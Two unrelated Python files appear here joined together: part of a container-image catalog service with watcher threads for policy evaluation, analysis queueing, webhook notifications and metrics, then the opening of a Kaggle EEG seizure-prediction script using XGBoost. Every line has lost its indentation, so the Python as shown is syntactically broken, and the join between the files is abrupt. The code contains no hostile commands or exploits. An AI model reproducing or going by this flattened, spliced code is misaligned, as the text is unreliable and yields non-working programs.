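# unconditionally.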
def handle_policyeval(*args, **kwargs):
global system_user_auth, bundle_user_is_updated, feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: policy eval (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
feed_updated = check_feedmeta_update(dbsession)
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# policy evaluations
doperform = False
policy_subs = []
for subscription_type in ['policy_eval']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in policy_subs:
policy_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in policy_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
# TODO - checks to avoid performing eval if nothing has changed
doperform = True
if doperform:
logger.debug("calling policy eval perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_policy_evaluation(userId, imageDigest, dbsession,
evaltag=fulltag)
except Exception as err:
logger.warn("policy evaluation failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in policy eval / vuln scan handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
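# Descriptive note (added comment): handle_analyzer_queue makes two passes per account. First it
# resets images stuck in the 'analyzing' working state longer than image_analyze_timeout_seconds
# (default 36000s); then it enqueues every image still in the base 'not_analyzed' state onto the
# 'images_to_analyze' simplequeue, skipping images that are already queued.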
def handle_analyzer_queue(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
localconfig = anchore_engine.configuration.localconfig.get_config()
obj_mgr = object_store.get_manager()
try:
max_working_time = int(localconfig['image_analyze_timeout_seconds'])
except:
max_working_time = 36000
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: analyzer queuer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(include_service=False)
q_client = internal_client_for(SimpleQueueClient, userId=None)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
# do this in passes, for each analysis_status state
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.working_state('analyze')}
workingstate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# first, evaluate images looking for those that have been in working state for too long and reset
for image_record in workingstate_image_records:
imageDigest = image_record['imageDigest']
if image_record['image_status'] == taskstate.complete_state('image_status'):
state_time = int(time.time()) - image_record['last_updated']
logger.debug("image in working state for (" + str(state_time) + ")s - " + str(imageDigest))
if state_time > max_working_time:
logger.warn("image has been in working state (" + str(
taskstate.working_state('analyze')) + ") for over (" + str(
max_working_time) + ") seconds - resetting and requeueing for analysis")
image_record['analysis_status'] = taskstate.reset_state('analyze')
with db.session_scope() as dbsession:
db_catalog_image.update_record(image_record, session=dbsession)
# next, look for any image in base state (not_analyzed) for queuing
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.base_state('analyze')}
# dbfilter = {}
basestate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
for basestate_image_record in basestate_image_records:
imageDigest = basestate_image_record['imageDigest']
image_record = basestate_image_record
# dbfilter = {'imageDigest': imageDigest}
# with db.session_scope() as dbsession:
# image_records = db.db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# image_record = image_records[0]
if image_record['image_status'] == taskstate.complete_state('image_status'):
logger.debug("image check")
if image_record['analysis_status'] == taskstate.base_state('analyze'):
logger.debug("image in base state - " + str(imageDigest))
try:
manifest = obj_mgr.get_document(userId, 'manifest_data', image_record['imageDigest'])
except Exception as err:
logger.debug("failed to get manifest - {}".format(str(err)))
manifest = {}
qobj = {}
qobj['userId'] = userId
qobj['imageDigest'] = image_record['imageDigest']
qobj['manifest'] = manifest
try:
if not q_client.is_inqueue('images_to_analyze', qobj):
# queue image for analysis
logger.debug("queued image for analysis: " + str(imageDigest))
qobj = q_client.enqueue('images_to_analyze', qobj)
# set the appropriate analysis state for image
# image_record['analysis_status'] = taskstate.queued_state('analyze')
# image_record['analysis_status'] = taskstate.working_state('analyze')
# with db.session_scope() as dbsession:
# rc = db.db_catalog_image.update_record(image_record, session=dbsession)
else:
logger.debug("image already queued")
except Exception as err:
logger.error("failed to check/queue image for analysis - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
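# Descriptive note (added comment): handle_notifications drains the per-subscription-type queues
# from simplequeue into the local notification table (honoring the catalog event_log notification
# config for 'event_log' entries), then attempts webhook delivery of each stored record and
# retries until the record's deadline (notification_retry_timeout, default 30s) has passed.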
def handle_notifications(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
q_client = internal_client_for(SimpleQueueClient, userId=None)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
notification_timeout = int(localconfig['webhooks']['notification_retry_timeout'])
except:
notification_timeout = 30
logger.debug("notification timeout: " + str(notification_timeout))
# get the event log notification config
try:
event_log_config = localconfig.get('services', {}).get('catalog', {}).get('event_log', None)
if event_log_config and 'notification' in event_log_config:
notify_events = event_log_config.get('notification').get('enabled', False)
if notify_events and 'level' in event_log_config.get('notification'):
event_levels = event_log_config.get('notification').get('level')
event_levels = [level.lower() for level in event_levels]
else:
event_levels = None
else:
notify_events = False
event_levels = None
except:
logger.exception('Ignoring errors parsing for event_log configuration')
notify_events = False
event_levels = None
# regular event queue notifications + event log notification
event_log_type = 'event_log'
for subscription_type in anchore_engine.common.subscription_types + [event_log_type]:
logger.debug("notifier: " + subscription_type)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
try:
qlen = q_client.qlen(subscription_type)
except Exception as err:
logger.debug(
"problem looking for notifications in queue: " + str(subscription_type) + " - exception: " + str(
err))
qlen = 0
while (qlen > 0):
pupdate_record = q_client.dequeue(subscription_type)
if pupdate_record:
logger.debug("got notification from queue: " + json.dumps(pupdate_record, indent=4))
notification = pupdate_record['data']
userId = notification['userId']
subscription_key = notification['subscription_key']
notificationId = notification['notificationId']
for account in accounts:
try:
if userId == account['name']:
notification_record = None
if subscription_type in anchore_engine.common.subscription_types:
dbfilter = {'subscription_type': subscription_type,
'subscription_key': subscription_key}
subscription_records = db_subscriptions.get_byfilter(account['name'],
session=dbsession, **dbfilter)
if subscription_records:
subscription = subscription_records[0]
if subscription and subscription['active']:
notification_record = notifications.make_notification(account,
subscription_type,
notification)
elif subscription_type == event_log_type: # handle event_log differently since its not a type of subscriptions
if notify_events and (
event_levels is None or subscription_key.lower() in event_levels):
notification.pop('subscription_key',
None) # remove subscription_key property from notification
notification_record = notifications.make_notification(account, subscription_type,
notification)
if notification_record:
logger.spew("Storing NOTIFICATION: " + str(account) + str(notification_record))
db_queues.add(subscription_type, userId, notificationId, notification_record, 0,
int(time.time() + notification_timeout), session=dbsession)
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("cannot store notification to DB - exception: " + str(err))
qlen = q_client.qlen(subscription_type)
for account in accounts:
notification_records = db_queues.get_all(subscription_type, account['name'], session=dbsession)
for notification_record in notification_records:
logger.debug("drained to send: " + json.dumps(notification_record))
try:
rc = notifications.notify(account, notification_record)
if rc:
db_queues.delete_record(notification_record, session=dbsession)
except Exception as err:
logger.debug("failed to send notification, storing for retry - exception: " + str(err))
notification_record['tries'] = int(time.time())
if notification_record['tries'] > notification_record['max_tries']:
logger.error("hit max notification timeout: dropping notificaion")
db_queues.delete_record(notification_record, session=dbsession)
else:
db_queues.update_record(notification_record, session=dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
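# Descriptive note (added comment): handle_metrics is another looping watcher. Each cycle it times
# a DB read, a DB write, and a combined read/write probe, and publishes the free space of tmp_dir
# as the anchore_tmpspace_available_bytes gauge, so DB latency and storage pressure are visible
# from the metrics endpoint.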
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while (True):
# perform some DB read/writes for metrics gathering
if anchore_engine.subsys.metrics.is_enabled():
# DB probes
anchore_record = None
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_read_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read probe - exception: " + str(err))
if anchore_record:
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_write_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB write probe - exception: " + str(err))
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_readwrite_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read/write probe - exception: " + str(err))
# FS probes
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
time.sleep(cycle_timer)
def handle_archive_tasks(*args, **kwargs):
"""
Handles periodic scan tasks for archive rule processing
:param args:
:param kwargs:
:return:
"""
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
start_time = time.time()
logger.debug("FIRING: " + str(watcher))
task_id = None
try:
logger.info('Starting analysis archive transition rule processor')
with db.session_scope() as session:
# Get accounts that have rules
accounts = session.query(ArchiveTransitionRule.account).distinct(ArchiveTransitionRule.account).all()
if accounts:
accounts = [x[0] for x in accounts]
logger.debug('Found accounts {} with transition rules'.format(accounts))
for account in accounts:
task = archiver.ArchiveTransitionTask(account)
task_id = task.task_id
logger.info('Starting archive transition task {} for account {}'.format(task.task_id, account))
task.run()
logger.info('Archive transition task {} complete'.format(task.task_id))
except Exception as ex:
logger.exception('Caught unexpected exception')
finally:
logger.debug('Analysis archive task {} execution time: {} seconds'.format(task_id, time.time() - start_time))
logger.debug('Sleeping until next cycle since no messages to process')
return True
click = 0
running = False
last_run = 0
system_user_auth = ('anchore-system', '')
# policy update check data
feed_sync_updated = False
bundle_user_last_updated = {}
bundle_user_is_updated = {}
default_lease_ttl = 60 # 60 second ttl, should be more than enough in most cases
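# Descriptive note (added comment): watcher_func is the generic task consumer. It dequeues entries
# from the 'watcher_tasks' simplequeue and invokes the matching handler from the watchers table;
# when the watcher defines a task_lease_id, the handler is wrapped in
# simplequeue.run_target_with_lease so only one catalog instance executes that task at a time.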
def watcher_func(*args, **kwargs):
global system_user_auth
while (True):
logger.debug("starting generic watcher")
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
else:
q_client = internal_client_for(SimpleQueueClient, userId=None)
lease_id = None
try:
logger.debug("attempting dequeue")
qobj = q_client.dequeue('watcher_tasks', max_wait_seconds=30)
logger.debug("dequeue complete")
if qobj:
logger.debug("got task from queue: " + str(qobj))
watcher = qobj['data']['watcher']
handler = watchers[watcher]['handler']
args = []
kwargs = {'mythread': watchers[watcher]}
lease_id = watchers[watcher]['task_lease_id']
# Old way
timer = time.time()
if not lease_id:
logger.debug(
'No task lease defined for watcher {}, initiating without lock protection'.format(watcher))
rc = handler(*args, **kwargs)
else:
rc = simplequeue.run_target_with_lease(None, lease_id, handler,
ttl=default_lease_ttl, *args, **kwargs)
else:
logger.debug("nothing in queue")
except (simplequeue.LeaseAcquisitionFailedError, simplequeue.LeaseUnavailableError) as e:
logger.debug('Lease acquisition could not complete, but this is probably due to another process with the lease: {}'.format(e))
except Exception as err:
logger.warn("failed to process task this cycle: " + str(err))
logger.debug("generic watcher done")
time.sleep(5)
def schedule_watcher(watcher):
global watchers, watcher_task_template, system_user_auth
if watcher not in watchers:
logger.warn("input watcher {} not in list of available watchers {}".format(watcher, list(watchers.keys())))
return (False)
if watchers[watcher]['taskType']:
logger.debug("should queue job: " + watcher)
watcher_task = copy.deepcopy(watcher_task_template)
watcher_task['watcher'] = watcher
watcher_task['taskType'] = watchers[watcher]['taskType']
try:
q_client = internal_client_for(SimpleQueueClient, userId=None)
if not q_client.is_inqueue('watcher_tasks', watcher_task):
qobj = q_client.enqueue('watcher_tasks', watcher_task)
logger.debug(str(watcher_task) + ": init task queued: " + str(qobj))
else:
logger.debug(str(watcher_task) + ": init task already queued")
watchers[watcher]['last_queued'] = time.time()
except Exception as err:
logger.warn("failed to enqueue watcher task: " + str(err))
return (True)
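# Descriptive note (added comment): monitor_func is kicked periodically by monitor() below. After
# a short warm-up it clamps any configured cycle_timer between each watcher's min/max bounds (a
# negative configured value bypasses the clamp) and spawns one thread per watcher: looping
# handlers (taskType None) run their handler directly, while task-based handlers get a
# watcher_func thread plus periodic enqueueing via schedule_watcher.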
def monitor_func(**kwargs):
global click, running, last_queued, system_user_auth, watchers, last_run
if click < 5:
click = click + 1
logger.debug("Catalog monitor starting in: " + str(5 - click))
return (True)
if running or ((time.time() - last_run) < kwargs['kick_timer']):
return (True)
logger.debug("FIRING: catalog_monitor")
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
for watcher in list(watchers.keys()):
if not watchers[watcher]['initialized']:
# first time
if 'cycle_timers' in kwargs and watcher in kwargs['cycle_timers']:
try:
the_cycle_timer = watchers[watcher]['cycle_timer']
min_cycle_timer = watchers[watcher]['min_cycle_timer']
max_cycle_timer = watchers[watcher]['max_cycle_timer']
config_cycle_timer = int(kwargs['cycle_timers'][watcher])
if config_cycle_timer < 0:
the_cycle_timer = abs(int(config_cycle_timer))
elif config_cycle_timer < min_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is less than the allowed min (" + str(
min_cycle_timer) + ") - using allowed min")
the_cycle_timer = min_cycle_timer
elif config_cycle_timer > max_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is greater than the allowed max (" + str(
max_cycle_timer) + ") - using allowed max")
the_cycle_timer = max_cycle_timer
else:
the_cycle_timer = config_cycle_timer
watchers[watcher]['cycle_timer'] = the_cycle_timer
except Exception as err:
logger.warn(
"exception setting custom cycle timer for handler (" + str(watcher) + ") - using default")
watchers[watcher]['initialized'] = True
if watcher not in watcher_threads:
if watchers[watcher]['taskType']:
# spin up a generic task watcher
logger.debug("starting generic task thread")
watcher_threads[watcher] = threading.Thread(target=watcher_func, args=[watcher], kwargs={})
watcher_threads[watcher].start()
else:
# spin up a specific looping watcher thread
watcher_threads[watcher] = threading.Thread(target=watchers[watcher]['handler'],
args=watchers[watcher]['args'],
kwargs={'mythread': watchers[watcher]})
watcher_threads[watcher].start()
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
elif time.time() - watchers[watcher]['last_queued'] > watchers[watcher]['cycle_timer']:
rc = schedule_watcher(watcher)
except Exception as err:
logger.error(str(err))
finally:
logger.debug("FIRING DONE: catalog_monitor")
running = False
last_run = time.time()
logger.debug("exiting monitor thread")
monitor_thread = None
def monitor(*args, **kwargs):
global monitor_thread
try:
donew = False
if monitor_thread:
if monitor_thread.isAlive():
logger.spew("MON: thread still running")
else:
logger.spew("MON: thread stopped running")
donew = True
monitor_thread.join()
logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.isAlive()))
else:
logger.spew("MON: no thread")
donew = True
if donew:
logger.spew("MON: starting")
monitor_thread = threading.Thread(target=monitor_func, kwargs=kwargs)
monitor_thread.start()
else:
logger.spew("MON: skipping")
except Exception as err:
logger.warn("MON thread start exception: " + str(err))
class CatalogService(ApiService):
__service_name__ = 'catalog'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__monitor_fn__ = monitor
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.post_db, self._init_object_storage, {})
self.register_handler(LifeCycleStages.post_register, self._init_policies, {})
def _init_object_storage(self):
try:
did_init = object_store.initialize(self.configuration, manager_id=DEFAULT_OBJECT_STORE_MANAGER_ID, config_keys=[DEFAULT_OBJECT_STORE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY], allow_legacy_fallback=True)
if not did_init:
logger.warn('Unexpectedly found the object store already initialized. This is not an expected condition. Continuing with driver: {}'.format(object_store.get_manager().primary_client.__config_name__))
except Exception as err:
logger.exception("Error initializing the object store: check catalog configuration")
raise err
try:
archive.initialize(self.configuration)
except Exception as err:
logger.exception("Error initializing analysis archive: check catalog configuration")
raise err
def _init_policies(self):
"""
Ensure all accounts have a default policy in place
:return:
"""
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
for account_dict in mgr.list_accounts(include_service=False):
try:
logger.info('Checking default policy bundle for account: {}'.format(account_dict['name']))
userId = account_dict['name'] # Old keys are userId, now that maps to account name
bundle_records = db_policybundle.get_all_byuserId(userId, session=dbsession)
if not bundle_records:
logger.debug("Account {} has no policy bundle - installing default".format(userId))
config = self.global_configuration
if config.get('default_bundle_file', None) and os.path.exists(config['default_bundle_file']):
logger.info("loading def bundle: " + str(config['default_bundle_file']))
try:
default_bundle = {}
with open(config['default_bundle_file'], 'r') as FH:
default_bundle = json.loads(FH.read())
if default_bundle:
bundle_url = obj_mgr.put_document(userId, 'policy_bundles', default_bundle['id'],
default_bundle)
policy_record = make_policy_record(userId, default_bundle, active=True)
rc = db_policybundle.add(policy_record['policyId'], userId, True, policy_record,
session=dbsession)
if not rc:
raise Exception("policy bundle DB add failed")
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
logger.error("could not load up default bundle for user - exception: " + str(err))
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
raise Exception("unable to initialize default user data - exception: " + str(err))
watchers = {
'image_watcher': {'handler': handle_image_watcher, 'task_lease_id': 'image_watcher',
'taskType': 'handle_image_watcher', 'args': [], 'cycle_timer': 600, 'min_cycle_timer': 300,
'max_cycle_timer': 86400 * 7, 'last_queued': 0, 'last_return': False, 'initialized': False},
'repo_watcher': {'handler': handle_repo_watcher, 'task_lease_id': 'repo_watcher', 'taskType': 'handle_repo_watcher',
'args': [], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 7,
'last_queued': 0, 'last_return': False, 'initialized': False},
'policy_eval': {'handler': handle_policyeval, 'task_lease_id': 'policy_eval', 'taskType': 'handle_policyeval',
'args': [], 'cycle_timer': 300, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2,
'last_queued': 0, 'last_return': False, 'initialized': False},
'analyzer_queue': {'handler': handle_analyzer_queue, 'task_lease_id': 'analyzer_queue',
'taskType': 'handle_analyzer_queue', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1,
'max_cycle_timer': 7200, 'last_queued': 0, 'last_return': False, 'initialized': False},
'notifications': {'handler': handle_notifications, 'task_lease_id': 'notifications',
'taskType': 'handle_notifications', 'args': [], 'cycle_timer': 10, 'min_cycle_timer': 10,
'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False, 'initialized': False},
'vulnerability_scan': {'handler': handle_vulnerability_scan, 'task_lease_id': 'vulnerability_scan',
'taskType': 'handle_vulnerability_scan', 'args': [], 'cycle_timer': 300,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False,
'initialized': False},
'account_resource_cleanup': {'handler': handle_account_resource_cleanup, 'task_lease_id': 'account_resource_cleanup',
'taskType': 'handle_account_resource_cleanup', 'args': [], 'cycle_timer': 30,
'min_cycle_timer': 30, 'max_cycle_timer': 30, 'last_queued': 0, 'last_return': False,
'initialized': False},
'service_watcher': {'handler': handle_service_watcher, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 10, 'min_cycle_timer': 1, 'max_cycle_timer': 300, 'last_queued': 0,
'last_return': False, 'initialized': False},
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat,
'task_lease_id': False, 'taskType': None, 'args': [CatalogService.__service_name__],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'archive_tasks': {'handler': handle_archive_tasks, 'task_lease_id': 'archive_transitions', 'taskType': 'handle_archive_tasks', 'args': [], 'cycle_timer': 43200,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 5, 'last_queued': 0, 'last_return': False,
'initialized': False},
}
watcher_task_template = {
'taskType': None,
'watcher': None,
}
watcher_threads = {}
|
seizure-boost-0-6-lb.py
|
# coding: utf-8
__author__ = 'ZFTurbo: https://kaggle.com/zfturbo'
import datetime
import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn.cross_validation import KFold
from sklearn.metrics import roc_auc_score
from scipy.io import loadmat
from operator import itemgetter
import random
import os
import time
import glob
import re
from multiprocessing import Process
import copy
random.seed(2016)
np.random.seed(2016)
def natural_key(string_):
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_)]
def create_feature_map(features):
outfile = open('xgb.fmap', 'w')
for i, feat in enumerate(features):
outfile.write('{0}\t{1}\tq\n'.format(i, feat))
outfile.close()
def get_importance(gbm, features):
create_feature_map(features)
importance = gbm.get_fscore(fmap='xgb.fmap')
importance = sorted(importance.items(), key=itemgetter(1), reverse=True)
return importance
def intersect(a, b):
return list(set(a) & set(b))
def print_features_importance(imp):
for i in range(len(imp)):
print("# " + str(imp[i][1]))
print('output.remove(\'' + imp[i][0] + '\')')
def mat_to_pandas(path):
mat = loadmat(path)
names = mat['dataStruct'].dtype.names
ndata = {n: mat['dataStruct'][n][0, 0] for n in names}
sequence = -1
if 'sequence' in names:
sequence = mat['dataStruct']['sequence']
return pd.DataFrame(ndata['data'], columns=ndata['channelIndices'][0]), sequence
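# Descriptive note (added comment): the two create_simple_csv_* functions below reduce each EEG
# .mat segment to a single CSV row: the mean of each of the 16 channels plus the file size, with
# the class label taken from the training filename. Training segments are grouped in blocks of six
# into a shared sequence_id so that cross validation can split on whole recording sequences rather
# than individual files.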
def create_simple_csv_train(patient_id):
out = open("simple_train_" + str(patient_id) + ".csv", "w")
out.write("Id,sequence_id,patient_id")
for i in range(16):
out.write(",avg_" + str(i))
out.write(",file_size,result\n")
# TRAIN (0)
out_str = ''
files = sorted(glob.glob("../input/train_" + str(patient_id) + "/*0.mat"), key=natural_key)
sequence_id = 0
total = 0
for fl in files:
total += 1
# print('Go for ' + fl)
id_str = os.path.basename(fl)[:-4]
arr = id_str.split("_")
patient = int(arr[0])
id = int(arr[1])
result = int(arr[2])
new_id = patient*100000 + id
try:
tables, sequence_from_mat = mat_to_pandas(fl)
except:
print('Some error here {}...'.format(fl))
continue
out_str += str(new_id) + "," + str(sequence_id) + "," + str(patient)
for f in sorted(list(tables.columns.values)):
mean = tables[f].mean()
out_str += "," + str(mean)
out_str += "," + str(os.path.getsize(fl)) + "," + str(result) + "\n"
if total % 6 == 0:
if int(sequence_from_mat) != 6:
print('Check error! {}'.format(sequence_from_mat))
exit()
sequence_id += 1
out.write(out_str)
# TRAIN (1)
out_str = ''
files = sorted(glob.glob("../input/train_" + str(patient_id) + "/*1.mat"), key=natural_key)
sequence_id += 1
total = 0
for fl in files:
total += 1
# print('Go for ' + fl)
id_str = os.path.basename(fl)[:-4]
arr = id_str.split("_")
patient = int(arr[0])
id = int(arr[1])
result = int(arr[2])
new_id = patient*100000 + id
try:
tables, sequence_from_mat = mat_to_pandas(fl)
except:
print('Some error here {}...'.format(fl))
continue
out_str += str(new_id) + "," + str(sequence_id) + "," + str(patient)
for f in sorted(list(tables.columns.values)):
mean = tables[f].mean()
out_str += "," + str(mean)
out_str += "," + str(os.path.getsize(fl)) + "," + str(result) + "\n"
if total % 6 == 0:
if int(sequence_from_mat) != 6:
print('Check error! {}'.format(sequence_from_mat))
exit()
sequence_id += 1
out.write(out_str)
out.close()
print('Train CSV for patient {} has been completed...'.format(patient_id))
def create_simple_csv_test(patient_id):
# TEST
out_str = ''
files = sorted(glob.glob("../input/test_" + str(patient_id) + "_new/*.mat"), key=natural_key)
out = open("simple_test_" + str(patient_id) + ".csv", "w")
out.write("Id,patient_id")
for i in range(16):
out.write(",avg_" + str(i))
out.write(",file_size\n")
for fl in files:
# print('Go for ' + fl)
id_str = os.path.basename(fl)[:-4]
arr = id_str.split("_")
patient = int(arr[1])
id = int(arr[2])
new_id = patient*100000 + id
try:
tables, sequence_from_mat = mat_to_pandas(fl)
except:
print('Some error here {}...'.format(fl))
continue
out_str += str(new_id) + "," + str(patient)
for f in sorted(list(tables.columns.values)):
mean = tables[f].mean()
out_str += "," + str(mean)
out_str += "," + str(os.path.getsize(fl)) + "\n"
# break
out.write(out_str)
out.close()
print('Test CSV for patient {} has been completed...'.format(patient_id))
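# Descriptive note (added comment): run_single trains one XGBoost model with a single 80/20
# holdout. The split is taken over unique sequence_id values rather than individual rows, so all
# six segments of a recording sequence land on the same side of the split and near-duplicate
# segments cannot leak between train and validation.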
def run_single(train, test, features, target, random_state=1):
eta = 0.2
max_depth = 3
subsample = 0.9
colsample_bytree = 0.9
start_time = time.time()
print('XGBoost params. ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, COLSAMPLE_BY_TREE: {}'.format(eta, max_depth, subsample, colsample_bytree))
params = {
"objective": "binary:logistic",
"booster" : "gbtree",
"eval_metric": "auc",
"eta": eta,
"tree_method": 'exact',
"max_depth": max_depth,
"subsample": subsample,
"colsample_bytree": colsample_bytree,
"silent": 1,
"seed": random_state,
}
num_boost_round = 1000
early_stopping_rounds = 50
test_size = 0.2
unique_sequences = np.array(train['sequence_id'].unique())
kf = KFold(len(unique_sequences), n_folds=int(round(1/test_size, 0)), shuffle=True, random_state=random_state)
train_seq_index, test_seq_index = list(kf)[0]
print('Length of sequence train: {}'.format(len(train_seq_index)))
print('Length of sequence valid: {}'.format(len(test_seq_index)))
train_seq = unique_sequences[train_seq_index]
valid_seq = unique_sequences[test_seq_index]
X_train, X_valid = train[train['sequence_id'].isin(train_seq)][features], train[train['sequence_id'].isin(valid_seq)][features]
y_train, y_valid = train[train['sequence_id'].isin(train_seq)][target], train[train['sequence_id'].isin(valid_seq)][target]
X_test = test[features]
print('Length train:', len(X_train))
print('Length valid:', len(X_valid))
dtrain = xgb.DMatrix(X_train, y_train)
dvalid = xgb.DMatrix(X_valid, y_valid)
watchlist = [(dtrain, 'train'), (dvalid, 'eval')]
gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,
early_stopping_rounds=early_stopping_rounds, verbose_eval=True)
print("Validating...")
check = gbm.predict(xgb.DMatrix(X_valid), ntree_limit=gbm.best_iteration+1)
score = roc_auc_score(y_valid, check)
